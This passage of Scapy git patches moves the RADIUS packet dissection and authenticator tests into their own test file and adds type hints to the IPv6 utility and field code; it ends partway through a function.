-assert(radius_packet.attributes[2].value == b'l0\xb9\x8d\xca\xfc!\xf3\xa7\x08\x80\xe1\xf6}\x84\xff') -assert(radius_packet.attributes[3].type == 24) -assert(type(radius_packet.attributes[3]) == RadiusAttr_State) -assert(radius_packet.attributes[3].len == 18) -assert(radius_packet.attributes[3].value == b'iQs\xf7hRb@k\x9d,\xa0\x99\x8ehO') - -= RADIUS - Response Authenticator computation -s = b'\x01\xae\x01\x17>k\xd4\xc4\x19V\x0b*1\x99\xc8D\xea\xc2\x94Z\x01\x06leap\x06\x06\x00\x00\x00\x02\x1a\x1b\x00\x00\x00\t\x01\x15service-type=Framed\x0c\x06\x00\x00#\xee\x1e\x13AC-7E-8A-4E-E2-92\x1f\x1300-26-73-9E-0F-D3O\x0b\x02\x01\x00\t\x01leapP\x12U\xbc\x12\xcdM\x00\xf8\xdb4\xf1\x18r\xca_\x8c\xf6f\x02\x1a1\x00\x00\x00\t\x01+audit-session-id=0AC8090E0000001A0354CA00\x1a\x14\x00\x00\x00\t\x01\x0emethod=dot1x\x08\x06\xc0\xa8\n\xb9\x04\x06\xc0\xa8\n\x80\x1a\x1d\x00\x00\x00\t\x02\x17GigabitEthernet1/0/18W\x17GigabitEthernet1/0/18=\x06\x00\x00\x00\x0f\x05\x06\x00\x00\xc3\xc6' -access_request = Radius(s) -s = b'\x0b\xae\x00[\xc7\xae\xfc6\xa1=\xb5\x99&^\xdf=\xe9\x00\xa6\xe8\x12\rHello, leapO\x16\x01\x02\x00\x14\x11\x01\x00\x08\xb8\xc4\x1a4\x97x\xd3\x82leapP\x12\xd3\x12\x17\xa6\x0c.\x94\x85\x03]t\xd1\xdb\xd0\x13\x8c\x18\x12iQs\xf7iSb@k\x9d,\xa0\x99\x8ehO' -access_challenge = Radius(s) -access_challenge.compute_authenticator(access_request.authenticator, b"radiuskey") == access_challenge.authenticator - -= RADIUS - Layers (1) -radius_attr = RadiusAttr_EAP_Message(value = EAP()) -assert(RadiusAttr_EAP_Message in radius_attr) -assert(RadiusAttribute in radius_attr) -type(radius_attr[RadiusAttribute]) -assert(type(radius_attr[RadiusAttribute]) == RadiusAttr_EAP_Message) -assert(EAP in radius_attr.value) - -= RADIUS - sessions (1) -p = IP()/TCP(sport=1812)/Radius(authenticator="scapy")/RadiusAttribute(value="scapy") -l = PacketList(p) -s = l.sessions() # Crashed on commit: e42ecdc54556c4852ca06b1a6da6c1ccbf3f522e -assert len(s) == 1 - -= RADIUS - sessions (2) -p = IP()/UDP(sport=1812)/Radius(authenticator="scapy")/RadiusAttribute(value="scapy") -l = PacketList(p) -s = l.sessions() # Crashed on commit: e42ecdc54556c4852ca06b1a6da6c1ccbf3f522e -assert len(s) == 1 - -= Issue GH#1407 -s = b"Z\xa5\xaaUZ\xa5\xaaU\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe9\xc5\x00\x00\x14'\x02\x00\x00\x001\x9a\xe44\xea4" -isinstance(Radius(s), Radius) - -= RADIUS - attributes with IPv4 addresses - -r = raw(RadiusAttr_NAS_IP_Address()) -p = RadiusAttr_NAS_IP_Address(r) -assert p.type == 4 - -r = raw(RadiusAttr_Framed_IP_Address()) -p = RadiusAttr_Framed_IP_Address(r) -assert p.type == 8 - -= RadiusAttr_User_Password - -r = b'\x01\x00\x00\x1c0x10x20x30x40x50\x02\x08geheim' -p = Radius(r) -assert isinstance(p.attributes[0], RadiusAttr_User_Password) - - ############ ############ + Addresses generators diff --git a/test/scapy/layers/radius.uts b/test/scapy/layers/radius.uts new file mode 100644 index 00000000000..abf2241abc7 --- /dev/null +++ b/test/scapy/layers/radius.uts @@ -0,0 +1,213 @@ +% Scapy Radius layer tests + + +############ +############ ++ RADIUS tests + += IP/UDP/RADIUS - Build +s = raw(IP()/UDP(sport=1812)/Radius(authenticator="scapy")/RadiusAttribute(value="scapy")) +s == b'E\x00\x007\x00\x01\x00\x00@\x11|\xb3\x7f\x00\x00\x01\x7f\x00\x00\x01\x07\x14\x07\x14\x00#U\xb3\x01\x00\x00\x1bscapy\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x07scapy' + += IP/UDP/RADIUS - Dissection +p = IP(s) +Radius in p and len(p[Radius].attributes) == 1 and p[Radius].attributes[0].value == b"scapy" + += RADIUS - Access-Request - Dissection (1) +s = b'\x01\xae\x01\x17>k\xd4\xc4\x19V\x0b*1\x99\xc8D\xea\xc2\x94Z\x01\x06leap\x06\x06\x00\x00\x00\x02\x1a\x1b\x00\x00\x00\t\x01\x15service-type=Framed\x0c\x06\x00\x00#\xee\x1e\x13AC-7E-8A-4E-E2-92\x1f\x1300-26-73-9E-0F-D3O\x0b\x02\x01\x00\t\x01leapP\x12U\xbc\x12\xcdM\x00\xf8\xdb4\xf1\x18r\xca_\x8c\xf6f\x02\x1a1\x00\x00\x00\t\x01+audit-session-id=0AC8090E0000001A0354CA00\x1a\x14\x00\x00\x00\t\x01\x0emethod=dot1x\x08\x06\xc0\xa8\n\xb9\x04\x06\xc0\xa8\n\x80\x1a\x1d\x00\x00\x00\t\x02\x17GigabitEthernet1/0/18W\x17GigabitEthernet1/0/18=\x06\x00\x00\x00\x0f\x05\x06\x00\x00\xc3\xc6' +radius_packet = Radius(s) +assert(radius_packet.id == 174) +assert(radius_packet.len == 279) +assert(radius_packet.authenticator == b'>k\xd4\xc4\x19V\x0b*1\x99\xc8D\xea\xc2\x94Z') +assert(len(radius_packet.attributes) == 17) +assert(radius_packet.attributes[0].type == 1) +assert(type(radius_packet.attributes[0]) == RadiusAttr_User_Name) +assert(radius_packet.attributes[0].len == 6) +assert(radius_packet.attributes[0].value == b"leap") +assert(radius_packet.attributes[1].type == 6) +assert(type(radius_packet.attributes[1]) == RadiusAttr_Service_Type) +assert(radius_packet.attributes[1].len == 6) +assert(radius_packet.attributes[1].value == 2) +assert(radius_packet.attributes[2].type == 26) +assert(type(radius_packet.attributes[2]) == RadiusAttr_Vendor_Specific) +assert(radius_packet.attributes[2].len == 27) +assert(radius_packet.attributes[2].vendor_id == 9) +assert(radius_packet.attributes[2].vendor_type == 1) +assert(radius_packet.attributes[2].vendor_len == 21) +assert(radius_packet.attributes[2].value == b"service-type=Framed") +assert(radius_packet.attributes[6].type == 79) +assert(type(radius_packet.attributes[6]) == RadiusAttr_EAP_Message) +assert(radius_packet.attributes[6].len == 11) +assert(radius_packet.attributes[6].value.haslayer(EAP)) +assert(radius_packet.attributes[6].value[EAP].code == 2) +assert(radius_packet.attributes[6].value[EAP].id == 1) +assert(radius_packet.attributes[6].value[EAP].len == 9) +assert(radius_packet.attributes[6].value[EAP].type == 1) +assert(hasattr(radius_packet.attributes[6].value[EAP], "identity")) +assert(radius_packet.attributes[6].value[EAP].identity == b"leap") +assert(radius_packet.attributes[7].type == 80) +assert(type(radius_packet.attributes[7]) == RadiusAttr_Message_Authenticator) +assert(radius_packet.attributes[7].len == 18) +assert(radius_packet.attributes[7].value == b'U\xbc\x12\xcdM\x00\xf8\xdb4\xf1\x18r\xca_\x8c\xf6') +assert(radius_packet.attributes[11].type == 8) +assert(type(radius_packet.attributes[11]) == RadiusAttr_Framed_IP_Address) +assert(radius_packet.attributes[11].len == 6) +assert(radius_packet.attributes[11].value == '192.168.10.185') +assert(radius_packet.attributes[16].type == 5) +assert(type(radius_packet.attributes[16]) == RadiusAttr_NAS_Port) +assert(radius_packet.attributes[16].len == 6) +assert(radius_packet.attributes[16].value == 50118) + +f,v = radius_packet.getfield_and_val("authenticator") +assert f.i2repr(None, v) == '3e6bd4c419560b2a3199c844eac2945a' + += RADIUS - compute_message_authenticator() +ram = radius_packet[RadiusAttr_Message_Authenticator] +assert ram.compute_message_authenticator(radius_packet, b"dummy bytes", b"scapy") == b'I\x85l\x8f\xa5\xd6\xbc\xb5\x08\xe0<\xebH\x9d\xfb?' + += RADIUS - Access-Challenge - Dissection (2) +s = b'\x0b\xae\x00[\xc7\xae\xfc6\xa1=\xb5\x99&^\xdf=\xe9\x00\xa6\xe8\x12\rHello, leapO\x16\x01\x02\x00\x14\x11\x01\x00\x08\xb8\xc4\x1a4\x97x\xd3\x82leapP\x12\xd3\x12\x17\xa6\x0c.\x94\x85\x03]t\xd1\xdb\xd0\x13\x8c\x18\x12iQs\xf7iSb@k\x9d,\xa0\x99\x8ehO' +radius_packet = Radius(s) +assert(radius_packet.id == 174) +assert(radius_packet.len == 91) +assert(radius_packet.authenticator == b'\xc7\xae\xfc6\xa1=\xb5\x99&^\xdf=\xe9\x00\xa6\xe8') +assert(len(radius_packet.attributes) == 4) +assert(radius_packet.attributes[0].type == 18) +assert(type(radius_packet.attributes[0]) == RadiusAttribute) +assert(radius_packet.attributes[0].len == 13) +assert(radius_packet.attributes[0].value == b"Hello, leap") +assert(radius_packet.attributes[1].type == 79) +assert(type(radius_packet.attributes[1]) == RadiusAttr_EAP_Message) +assert(radius_packet.attributes[1].len == 22) +assert(radius_packet.attributes[1][EAP].code == 1) +assert(radius_packet.attributes[1][EAP].id == 2) +assert(radius_packet.attributes[1][EAP].len == 20) +assert(radius_packet.attributes[1][EAP].type == 17) +assert(radius_packet.attributes[2].type == 80) +assert(type(radius_packet.attributes[2]) == RadiusAttr_Message_Authenticator) +assert(radius_packet.attributes[2].len == 18) +assert(radius_packet.attributes[2].value == b'\xd3\x12\x17\xa6\x0c.\x94\x85\x03]t\xd1\xdb\xd0\x13\x8c') +assert(radius_packet.attributes[3].type == 24) +assert(type(radius_packet.attributes[3]) == RadiusAttr_State) +assert(radius_packet.attributes[3].len == 18) +assert(radius_packet.attributes[3].value == b'iQs\xf7iSb@k\x9d,\xa0\x99\x8ehO') + += RADIUS - Access-Request - Dissection (3) +s = b'\x01\xaf\x01DC\xbe!J\x08\xdf\xcf\x9f\x00v~,\xfb\x8e`\xc8\x01\x06leap\x06\x06\x00\x00\x00\x02\x1a\x1b\x00\x00\x00\t\x01\x15service-type=Framed\x0c\x06\x00\x00#\xee\x1e\x13AC-7E-8A-4E-E2-92\x1f\x1300-26-73-9E-0F-D3O&\x02\x02\x00$\x11\x01\x00\x18\rE\xc9\x92\xf6\x9ae\x04\xa2\x06\x13\x8f\x0b#\xf1\xc56\x8eU\xd9\x89\xe5\xa1)leapP\x12|\x1c\x9d[dv\x9c\x19\x96\xc6\xec\xb82\x8f\n f\x02\x1a1\x00\x00\x00\t\x01+audit-session-id=0AC8090E0000001A0354CA00\x1a\x14\x00\x00\x00\t\x01\x0emethod=dot1x\x08\x06\xc0\xa8\n\xb9\x04\x06\xc0\xa8\n\x80\x1a\x1d\x00\x00\x00\t\x02\x17GigabitEthernet1/0/18W\x17GigabitEthernet1/0/18=\x06\x00\x00\x00\x0f\x05\x06\x00\x00\xc3\xc6\x18\x12iQs\xf7iSb@k\x9d,\xa0\x99\x8ehO' +radius_packet = Radius(s) +assert(radius_packet.id == 175) +assert(radius_packet.len == 324) +assert(radius_packet.authenticator == b'C\xbe!J\x08\xdf\xcf\x9f\x00v~,\xfb\x8e`\xc8') +assert(len(radius_packet.attributes) == 18) +assert(radius_packet.attributes[0].type == 1) +assert(type(radius_packet.attributes[0]) == RadiusAttr_User_Name) +assert(radius_packet.attributes[0].len == 6) +assert(radius_packet.attributes[0].value == b"leap") +assert(radius_packet.attributes[1].type == 6) +assert(type(radius_packet.attributes[1]) == RadiusAttr_Service_Type) +assert(radius_packet.attributes[1].len == 6) +assert(radius_packet.attributes[1].value == 2) +assert(radius_packet.attributes[2].type == 26) +assert(type(radius_packet.attributes[2]) == RadiusAttr_Vendor_Specific) +assert(radius_packet.attributes[2].len == 27) +assert(radius_packet.attributes[2].vendor_id == 9) +assert(radius_packet.attributes[2].vendor_type == 1) +assert(radius_packet.attributes[2].vendor_len == 21) +assert(radius_packet.attributes[2].value == b"service-type=Framed") +assert(radius_packet.attributes[6].type == 79) +assert(type(radius_packet.attributes[6]) == RadiusAttr_EAP_Message) +assert(radius_packet.attributes[6].len == 38) +assert(radius_packet.attributes[6].value.haslayer(EAP)) +assert(radius_packet.attributes[6].value[EAP].code == 2) +assert(radius_packet.attributes[6].value[EAP].id == 2) +assert(radius_packet.attributes[6].value[EAP].len == 36) +assert(radius_packet.attributes[6].value[EAP].type == 17) +assert(radius_packet.attributes[7].type == 80) +assert(type(radius_packet.attributes[7]) == RadiusAttr_Message_Authenticator) +assert(radius_packet.attributes[7].len == 18) +assert(radius_packet.attributes[7].value == b'|\x1c\x9d[dv\x9c\x19\x96\xc6\xec\xb82\x8f\n ') +assert(radius_packet.attributes[11].type == 8) +assert(type(radius_packet.attributes[11]) == RadiusAttr_Framed_IP_Address) +assert(radius_packet.attributes[11].len == 6) +assert(radius_packet.attributes[11].value == '192.168.10.185') +assert(radius_packet.attributes[16].type == 5) +assert(type(radius_packet.attributes[16]) == RadiusAttr_NAS_Port) +assert(radius_packet.attributes[16].len == 6) +assert(radius_packet.attributes[16].value == 50118) +assert(radius_packet.attributes[17].type == 24) +assert(type(radius_packet.attributes[17]) == RadiusAttr_State) +assert(radius_packet.attributes[17].len == 18) +assert(radius_packet.attributes[17].value == b'iQs\xf7iSb@k\x9d,\xa0\x99\x8ehO') + += RADIUS - Access-Challenge - Dissection (4) +s = b'\x0b\xaf\x00K\x82 \x95=\xfd\x80\x05 -l}\xab)\xa5kU\x12\rHello, leapO\x06\x03\x03\x00\x04P\x12l0\xb9\x8d\xca\xfc!\xf3\xa7\x08\x80\xe1\xf6}\x84\xff\x18\x12iQs\xf7hRb@k\x9d,\xa0\x99\x8ehO' +radius_packet = Radius(s) +assert(radius_packet.id == 175) +assert(radius_packet.len == 75) +assert(radius_packet.authenticator == b'\x82 \x95=\xfd\x80\x05 -l}\xab)\xa5kU') +assert(len(radius_packet.attributes) == 4) +assert(radius_packet.attributes[0].type == 18) +assert(type(radius_packet.attributes[0]) == RadiusAttribute) +assert(radius_packet.attributes[0].len == 13) +assert(radius_packet.attributes[0].value == b"Hello, leap") +assert(radius_packet.attributes[1].type == 79) +assert(type(radius_packet.attributes[1]) == RadiusAttr_EAP_Message) +assert(radius_packet.attributes[1].len == 6) +assert(radius_packet.attributes[1][EAP].code == 3) +assert(radius_packet.attributes[1][EAP].id == 3) +assert(radius_packet.attributes[1][EAP].len == 4) +assert(radius_packet.attributes[2].type == 80) +assert(type(radius_packet.attributes[2]) == RadiusAttr_Message_Authenticator) +assert(radius_packet.attributes[2].len == 18) +assert(radius_packet.attributes[2].value == b'l0\xb9\x8d\xca\xfc!\xf3\xa7\x08\x80\xe1\xf6}\x84\xff') +assert(radius_packet.attributes[3].type == 24) +assert(type(radius_packet.attributes[3]) == RadiusAttr_State) +assert(radius_packet.attributes[3].len == 18) +assert(radius_packet.attributes[3].value == b'iQs\xf7hRb@k\x9d,\xa0\x99\x8ehO') + += RADIUS - Response Authenticator computation +s = b'\x01\xae\x01\x17>k\xd4\xc4\x19V\x0b*1\x99\xc8D\xea\xc2\x94Z\x01\x06leap\x06\x06\x00\x00\x00\x02\x1a\x1b\x00\x00\x00\t\x01\x15service-type=Framed\x0c\x06\x00\x00#\xee\x1e\x13AC-7E-8A-4E-E2-92\x1f\x1300-26-73-9E-0F-D3O\x0b\x02\x01\x00\t\x01leapP\x12U\xbc\x12\xcdM\x00\xf8\xdb4\xf1\x18r\xca_\x8c\xf6f\x02\x1a1\x00\x00\x00\t\x01+audit-session-id=0AC8090E0000001A0354CA00\x1a\x14\x00\x00\x00\t\x01\x0emethod=dot1x\x08\x06\xc0\xa8\n\xb9\x04\x06\xc0\xa8\n\x80\x1a\x1d\x00\x00\x00\t\x02\x17GigabitEthernet1/0/18W\x17GigabitEthernet1/0/18=\x06\x00\x00\x00\x0f\x05\x06\x00\x00\xc3\xc6' +access_request = Radius(s) +s = b'\x0b\xae\x00[\xc7\xae\xfc6\xa1=\xb5\x99&^\xdf=\xe9\x00\xa6\xe8\x12\rHello, leapO\x16\x01\x02\x00\x14\x11\x01\x00\x08\xb8\xc4\x1a4\x97x\xd3\x82leapP\x12\xd3\x12\x17\xa6\x0c.\x94\x85\x03]t\xd1\xdb\xd0\x13\x8c\x18\x12iQs\xf7iSb@k\x9d,\xa0\x99\x8ehO' +access_challenge = Radius(s) +access_challenge.compute_authenticator(access_request.authenticator, b"radiuskey") == access_challenge.authenticator + += RADIUS - Layers (1) +radius_attr = RadiusAttr_EAP_Message(value = EAP()) +assert(RadiusAttr_EAP_Message in radius_attr) +assert(RadiusAttribute in radius_attr) +type(radius_attr[RadiusAttribute]) +assert(type(radius_attr[RadiusAttribute]) == RadiusAttr_EAP_Message) +assert(EAP in radius_attr.value) + += RADIUS - sessions (1) +p = IP()/TCP(sport=1812)/Radius(authenticator="scapy")/RadiusAttribute(value="scapy") +l = PacketList(p) +s = l.sessions() # Crashed on commit: e42ecdc54556c4852ca06b1a6da6c1ccbf3f522e +assert len(s) == 1 + += RADIUS - sessions (2) +p = IP()/UDP(sport=1812)/Radius(authenticator="scapy")/RadiusAttribute(value="scapy") +l = PacketList(p) +s = l.sessions() # Crashed on commit: e42ecdc54556c4852ca06b1a6da6c1ccbf3f522e +assert len(s) == 1 + += Issue GH#1407 +s = b"Z\xa5\xaaUZ\xa5\xaaU\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe9\xc5\x00\x00\x14'\x02\x00\x00\x001\x9a\xe44\xea4" +isinstance(Radius(s), Radius) + += RADIUS - attributes with IPv4 addresses + +r = raw(RadiusAttr_NAS_IP_Address()) +p = RadiusAttr_NAS_IP_Address(r) +assert p.type == 4 + +r = raw(RadiusAttr_Framed_IP_Address()) +p = RadiusAttr_Framed_IP_Address(r) +assert p.type == 8 + += RadiusAttr_User_Password + +r = b'\x01\x00\x00\x1c0x10x20x30x40x50\x02\x08geheim' +p = Radius(r) +assert isinstance(p.attributes[0], RadiusAttr_User_Password) From 3bb15d2529cd55d308e6d8a2842377ae2d54ecf7 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Sun, 11 Oct 2020 20:26:37 +0200 Subject: [PATCH 0385/1632] Core typing: utils6.py --- .config/mypy/mypy_enabled.txt | 1 + scapy/config.py | 2 + scapy/fields.py | 30 ++--- scapy/utils6.py | 219 +++++++++++++++++++++++----------- test/regression.uts | 21 ++-- 5 files changed, 177 insertions(+), 96 deletions(-) diff --git a/.config/mypy/mypy_enabled.txt b/.config/mypy/mypy_enabled.txt index 207453a5e1f..cdcd23d135b 100644 --- a/.config/mypy/mypy_enabled.txt +++ b/.config/mypy/mypy_enabled.txt @@ -24,6 +24,7 @@ scapy/route.py scapy/route6.py scapy/sessions.py scapy/utils.py +scapy/utils6.py # LAYERS diff --git a/scapy/config.py b/scapy/config.py index 0f10f4efd66..c8b2e5c8fd5 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -764,6 +764,8 @@ class Conf(ConfClass): route6 = None # type: 'scapy.route6.Route6' manufdb = None # type: 'scapy.data.ManufDA' # 'route6' will be filed by route6.py + teredoPrefix = "" # type: str + teredoServerPort = None # type: int auto_fragment = True #: raise exception when a packet dissector raises an exception debug_dissector = False diff --git a/scapy/fields.py b/scapy/fields.py index afbe6d6fbc5..a188f9ea6ed 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -668,7 +668,7 @@ def randval(self): return RandMAC() -class IPField(Field[str, bytes]): +class IPField(Field[Union[str, Net], bytes]): def __init__(self, name, default): # type: (str, Optional[str]) -> None Field.__init__(self, name, default, "4s") @@ -687,7 +687,7 @@ def h2i(self, pkt, x): return x def i2h(self, pkt, x): - # type: (Optional[Packet], Optional[str]) -> str + # type: (Optional[Packet], Optional[Union[str, Net]]) -> str return cast(str, x) def resolve(self, x): @@ -703,7 +703,7 @@ def resolve(self, x): return x def i2m(self, pkt, x): - # type: (Optional[Packet], Optional[str]) -> bytes + # type: (Optional[Packet], Optional[Union[str, Net]]) -> bytes if x is None: return b'\x00\x00\x00\x00' return inet_aton(plain_str(x)) @@ -717,7 +717,7 @@ def any2i(self, pkt, x): return self.h2i(pkt, x) def i2repr(self, pkt, x): - # type: (Optional[Packet], str) -> str + # type: (Optional[Packet], Union[str, Net]) -> str r = self.resolve(self.i2h(pkt, x)) return r if isinstance(r, str) else repr(r) @@ -752,19 +752,19 @@ def __findaddr(self, pkt): return conf.route.route(dst)[1] def i2m(self, pkt, x): - # type: (Optional[Packet], Optional[str]) -> bytes + # type: (Optional[Packet], Optional[Union[str, Net]]) -> bytes if x is None and pkt is not None: x = self.__findaddr(pkt) return super(SourceIPField, self).i2m(pkt, x) def i2h(self, pkt, x): - # type: (Optional[Packet], Optional[str]) -> str + # type: (Optional[Packet], Optional[Union[str, Net]]) -> str if x is None and pkt is not None: x = self.__findaddr(pkt) return super(SourceIPField, self).i2h(pkt, x) -class IP6Field(Field[Optional[str], bytes]): +class IP6Field(Field[Optional[Union[str, Net6]], bytes]): def __init__(self, name, default): # type: (str, Optional[str]) -> None Field.__init__(self, name, default, "16s") @@ -777,17 +777,17 @@ def h2i(self, pkt, x): try: x = in6_ptop(x) except socket.error: - x = Net6(x) + return Net6(x) # type: ignore elif isinstance(x, list): x = [self.h2i(pkt, n) for n in x] return x # type: ignore def i2h(self, pkt, x): - # type: (Optional[Packet], Optional[str]) -> str + # type: (Optional[Packet], Optional[Union[str, Net6]]) -> str return cast(str, x) def i2m(self, pkt, x): - # type: (Optional[Packet], Optional[str]) -> bytes + # type: (Optional[Packet], Optional[Union[str, Net6]]) -> bytes if x is None: x = "::" return inet_pton(socket.AF_INET6, plain_str(x)) @@ -801,7 +801,7 @@ def any2i(self, pkt, x): return self.h2i(pkt, x) def i2repr(self, pkt, x): - # type: (Optional[Packet], Optional[str]) -> str + # type: (Optional[Packet], Optional[Union[str, Net6]]) -> str if x is None: return self.i2h(pkt, x) elif not isinstance(x, Net6) and not isinstance(x, list): @@ -828,7 +828,7 @@ def __init__(self, name, dstname): self.dstname = dstname def i2m(self, pkt, x): - # type: (Optional[Packet], Optional[str]) -> bytes + # type: (Optional[Packet], Optional[Union[str, Net6]]) -> bytes if x is None: dst = ("::" if self.dstname is None else getattr(pkt, self.dstname) or "::") @@ -836,7 +836,7 @@ def i2m(self, pkt, x): return super(SourceIP6Field, self).i2m(pkt, x) def i2h(self, pkt, x): - # type: (Optional[Packet], Optional[str]) -> str + # type: (Optional[Packet], Optional[Union[str, Net6]]) -> str if x is None: if conf.route6 is None: # unused import, only to initialize conf.route6 @@ -862,13 +862,13 @@ def __init__(self, name, default): DestField.__init__(self, name, default) def i2m(self, pkt, x): - # type: (Optional[Packet], Optional[str]) -> bytes + # type: (Optional[Packet], Optional[Union[str, Net6]]) -> bytes if x is None and pkt is not None: x = self.dst_from_pkt(pkt) return IP6Field.i2m(self, pkt, x) def i2h(self, pkt, x): - # type: (Optional[Packet], Optional[str]) -> str + # type: (Optional[Packet], Optional[Union[str, Net6]]) -> str if x is None and pkt is not None: x = self.dst_from_pkt(pkt) return super(DestIP6Field, self).i2h(pkt, x) diff --git a/scapy/utils6.py b/scapy/utils6.py index c2c68c941f1..5d2b7edf7dc 100644 --- a/scapy/utils6.py +++ b/scapy/utils6.py @@ -11,7 +11,6 @@ """ from __future__ import absolute_import import operator -import random import socket import struct import time @@ -25,13 +24,22 @@ from scapy.utils import strxor from scapy.compat import orb, chb from scapy.pton_ntop import inet_pton, inet_ntop -from scapy.volatile import RandMAC +from scapy.volatile import RandMAC, RandBin from scapy.error import warning, Scapy_Exception from functools import reduce, cmp_to_key -from scapy.modules.six.moves import range, zip + +from scapy.compat import ( + Any, + Iterator, + List, + Optional, + Tuple, + Union, +) def construct_source_candidate_set(addr, plen, laddr): + # type: (str, int, List[Tuple[str, int, str]]) -> List[str] """ Given all addresses assigned to a specific interface ('laddr' parameter), this function returns the "candidate set" associated with 'addr/plen'. @@ -44,6 +52,7 @@ def construct_source_candidate_set(addr, plen, laddr): with some specific destination that uses this prefix. """ def cset_sort(x, y): + # type: (str, str) -> int x_global = 0 if in6_isgladdr(x): x_global = 1 @@ -58,7 +67,7 @@ def cset_sort(x, y): return -1 return -res - cset = [] + cset = iter([]) # type: Iterator[Tuple[str, int, str]] if in6_isgladdr(addr) or in6_isuladdr(addr): cset = (x for x in laddr if x[1] == IPV6_ADDR_GLOBAL) elif in6_islladdr(addr): @@ -67,7 +76,7 @@ def cset_sort(x, y): cset = (x for x in laddr if x[1] == IPV6_ADDR_SITELOCAL) elif in6_ismaddr(addr): if in6_ismnladdr(addr): - cset = [('::1', 16, conf.loopback_name)] + cset = (x for x in [('::1', 16, conf.loopback_name)]) elif in6_ismgladdr(addr): cset = (x for x in laddr if x[1] == IPV6_ADDR_GLOBAL) elif in6_ismlladdr(addr): @@ -76,13 +85,14 @@ def cset_sort(x, y): cset = (x for x in laddr if x[1] == IPV6_ADDR_SITELOCAL) elif addr == '::' and plen == 0: cset = (x for x in laddr if x[1] == IPV6_ADDR_GLOBAL) - cset = [x[0] for x in cset] + addrs = [x[0] for x in cset] # TODO convert the cmd use into a key - cset.sort(key=cmp_to_key(cset_sort)) # Sort with global addresses first - return cset + addrs.sort(key=cmp_to_key(cset_sort)) # Sort with global addresses first + return addrs def get_source_addr_from_candidate_set(dst, candidate_set): + # type: (str, List[str]) -> str """ This function implement a limited version of source address selection algorithm defined in section 5 of RFC 3484. The format is very different @@ -91,6 +101,7 @@ def get_source_addr_from_candidate_set(dst, candidate_set): """ def scope_cmp(a, b): + # type: (str, str) -> int """ Given two addresses, returns -1, 0 or 1 based on comparison of their scope @@ -116,6 +127,7 @@ def scope_cmp(a, b): return -1 def rfc3484_cmp(source_a, source_b): + # type: (str, str) -> int """ The function implements a limited version of the rules from Source Address selection algorithm defined section of RFC 3484. @@ -157,7 +169,7 @@ def rfc3484_cmp(source_a, source_b): if not candidate_set: # Should not happen - return None + return "" candidate_set.sort(key=cmp_to_key(rfc3484_cmp), reverse=True) @@ -168,6 +180,7 @@ def rfc3484_cmp(source_a, source_b): # there are many others like that. # TODO : integrate Unique Local Addresses def in6_getAddrType(addr): + # type: (str) -> int naddr = inet_pton(socket.AF_INET6, addr) paddr = inet_ntop(socket.AF_INET6, naddr) # normalize addrType = 0 @@ -200,6 +213,7 @@ def in6_getAddrType(addr): def in6_mactoifaceid(mac, ulbit=None): + # type: (str, Optional[int]) -> str """ Compute the interface ID in modified EUI-64 format associated to the Ethernet address provided as input. @@ -208,20 +222,21 @@ def in6_mactoifaceid(mac, ulbit=None): to a specific value by using optional 'ulbit' parameter. """ if len(mac) != 17: - return None + raise ValueError("Invalid MAC") m = "".join(mac.split(':')) if len(m) != 12: - return None + raise ValueError("Invalid MAC") first = int(m[0:2], 16) if ulbit is None or not (ulbit == 0 or ulbit == 1): - ulbit = [1, '-', 0][first & 0x02] + ulbit = [1, 0, 0][first & 0x02] ulbit *= 2 - first = "%.02x" % ((first & 0xFD) | ulbit) - eui64 = first + m[2:4] + ":" + m[4:6] + "FF:FE" + m[6:8] + ":" + m[8:12] + first_b = "%.02x" % ((first & 0xFD) | ulbit) + eui64 = first_b + m[2:4] + ":" + m[4:6] + "FF:FE" + m[6:8] + ":" + m[8:12] return eui64.upper() -def in6_ifaceidtomac(ifaceid): +def in6_ifaceidtomac(ifaceid_s): + # type: (str) -> Optional[str] """ Extract the mac address from provided iface ID. Iface ID is provided in printable format ("XXXX:XXFF:FEXX:XXXX", eventually compressed). None @@ -229,9 +244,10 @@ def in6_ifaceidtomac(ifaceid): """ try: # Set ifaceid to a binary form - ifaceid = inet_pton(socket.AF_INET6, "::" + ifaceid)[8:16] + ifaceid = inet_pton(socket.AF_INET6, "::" + ifaceid_s)[8:16] except Exception: return None + if ifaceid[3:5] != b'\xff\xfe': # Check for burned-in MAC address return None @@ -248,6 +264,7 @@ def in6_ifaceidtomac(ifaceid): def in6_addrtomac(addr): + # type: (str) -> Optional[str] """ Extract the mac address from provided address. None is returned on error. @@ -259,6 +276,7 @@ def in6_addrtomac(addr): def in6_addrtovendor(addr): + # type: (str) -> Optional[str] """ Extract the MAC address from a modified EUI-64 constructed IPv6 address provided and use the IANA oui.txt file to get the vendor. @@ -279,6 +297,7 @@ def in6_addrtovendor(addr): def in6_getLinkScopedMcastAddr(addr, grpid=None, scope=2): + # type: (str, Optional[Union[bytes, str, int]], int) -> Optional[str] """ Generate a Link-Scoped Multicast Address as described in RFC 4489. Returned value is in printable notation. @@ -304,68 +323,81 @@ def in6_getLinkScopedMcastAddr(addr, grpid=None, scope=2): try: if not in6_islladdr(addr): return None - addr = inet_pton(socket.AF_INET6, addr) + baddr = inet_pton(socket.AF_INET6, addr) except Exception: warning("in6_getLinkScopedMcastPrefix(): Invalid address provided") return None - iid = addr[8:] + iid = baddr[8:] if grpid is None: - grpid = b'\x00\x00\x00\x00' + b_grpid = b'\x00\x00\x00\x00' else: - if isinstance(grpid, (bytes, str)): - if len(grpid) == 8: - try: - grpid = int(grpid, 16) & 0xffffffff - except Exception: - warning("in6_getLinkScopedMcastPrefix(): Invalid group id provided") # noqa: E501 - return None - elif len(grpid) == 4: - try: - grpid = struct.unpack("!I", grpid)[0] - except Exception: - warning("in6_getLinkScopedMcastPrefix(): Invalid group id provided") # noqa: E501 - return None - grpid = struct.pack("!I", grpid) + b_grpid = b'' + # Is either bytes, str or int + if isinstance(grpid, (str, bytes)): + try: + if isinstance(grpid, str) and len(grpid) == 8: + i_grpid = int(grpid, 16) & 0xffffffff + elif isinstance(grpid, bytes) and len(grpid) == 4: + i_grpid = struct.unpack("!I", grpid)[0] + else: + raise ValueError + except Exception: + warning( + "in6_getLinkScopedMcastPrefix(): Invalid group id " + "provided" + ) + return None + 